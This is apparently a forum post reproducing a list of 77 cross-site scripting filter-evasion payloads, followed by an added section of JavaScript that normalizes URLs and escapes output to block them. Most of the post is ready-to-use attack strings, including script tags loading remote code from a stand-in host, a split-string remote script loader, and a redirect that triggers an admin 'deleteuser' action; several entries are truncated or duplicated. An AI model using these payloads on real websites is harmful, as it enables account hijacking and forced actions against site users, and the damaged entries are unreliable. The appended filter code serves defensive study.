There seem to be few XSS resources on t00ls, so I'm copying over this good stuff I came across; not sure whether any of you need to bookmark it.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag without semicolon or quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed (defective) IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hexadecimal encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character-count limits (must all be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically useless domestically, since there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) Split expression in a STYLE attribute
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made up of an opening angle bracket and a name starting with a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can smuggle your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Dropping [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Dropping [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
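An added note with example code (written here, not part of the original post or of the cheat sheet it copies): most of the IMG/A/BODY/LINK/FRAME vectors above are the same javascript: or vbscript: URL in different disguises: mixed case (4), numeric HTML entities with and without semicolons (5, 8-10), embedded tab/newline/carriage return (11-14), a NUL byte (17) and leading spaces (19). A filter that looks for the literal string "javascript:" misses them, because the browser decodes entities and strips those characters before it ever parses the URL. The check below does the same decoding and stripping first and then allow-lists the scheme, and it encodes text and attribute values on output so the <SCRIPT>/<</SCRIPT> style vectors become inert text. The function names (naiveSchemeCheck, normalizeUrl, isSafeUrl, escapeHtml, renderLink), the allowed-scheme list and the sample inputs are assumptions of this example; the inputs are constructed from the categories listed above.

```javascript
// Example code added to this post; not from the original cheat sheet.
// The helper names and the allowed-scheme list below are assumptions.

// Naive approach: string search for the literal scheme. Shown only for
// contrast; it is fooled by every obfuscated variant listed in the post.
function naiveSchemeCheck(url) {
  return !String(url).toLowerCase().includes('javascript:');
}

// HTML decodes numeric character references (&#106; &#x6A; and, without a
// trailing semicolon, &#0000106) inside attribute values before URL parsing,
// so a filter must decode them too.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (m, code) => {
    const cp = code[0].toLowerCase() === 'x'
      ? parseInt(code.slice(1), 16)
      : parseInt(code, 10);
    return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}

// The URL parser strips leading/trailing control characters and spaces and
// removes tab, LF and CR anywhere in the string, so "jav\tascript:" reaches
// the scheme check as "javascript:". NUL is dropped as well (conservative).
function normalizeUrl(raw) {
  let s = decodeNumericEntities(String(raw));
  s = s.replace(/[\t\n\r\0]/g, '');
  s = s.replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '');
  return s;
}

// Allow-list of schemes (an assumption of this example). Anything with a
// scheme outside this set, including javascript:, vbscript: and data:, is
// rejected. Scheme-relative and path-relative URLs have no scheme and pass
// this check; host allow-listing is a separate concern.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

function isSafeUrl(raw) {
  const url = normalizeUrl(raw);
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  if (!m) return true;
  return ALLOWED_SCHEMES.has(m[1].toLowerCase());
}

// Output encoding for HTML text and double-quoted attribute contexts.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Builds a link from untrusted href and text: unsafe schemes are replaced by
// "#", and both values are encoded for their context.
function renderLink(href, text) {
  const safeHref = isSafeUrl(href) ? normalizeUrl(href) : '#';
  return `<a href="${escapeHtml(safeHref)}">${escapeHtml(text)}</a>`;
}

// Constructed sample inputs, one per disguise category in the post.
const SAMPLE_URLS = [
  "javascript:alert('XSS')",          // (3) plain
  "JaVaScRiPt:alert('XSS')",          // (4) mixed case
  "&#106;avascript:alert('XSS')",     // (5) decimal entity
  "&#0000106avascript:alert('XSS')",  // (9) long decimal, no semicolon
  "&#x6A;avascript:alert('XSS')",     // (10) hex entity
  "jav\tascript:alert('XSS')",        // (11) embedded tab
  "jav\nascript:alert('XSS')",        // (13) embedded newline
  "jav\rascript:alert('XSS')",        // (14) embedded CR
  "java\0script:alert('XSS')",        // (17) NUL byte
  "  javascript:alert('XSS')",        // (19) leading spaces
  'vbscript:msgbox("XSS")',           // (40) other script scheme
];

// Returns how many of the samples each check wrongly lets through.
function countMisses(check) {
  return SAMPLE_URLS.filter((u) => check(u)).length;
}

console.log('naive check misses:', countMisses(naiveSchemeCheck));
console.log('normalized check misses:', countMisses(isSafeUrl));
console.log(renderLink("javascript:alert('XSS')", 'XSS'));
```

Running it shows the naive string search accepting every entity-encoded, whitespace-split and NUL-split variant while the normalizing check rejects all of them, and still accepts ordinary, scheme-relative and IP-obfuscated http URLs such as those in (68)-(76), since those are about where a link goes rather than about script execution.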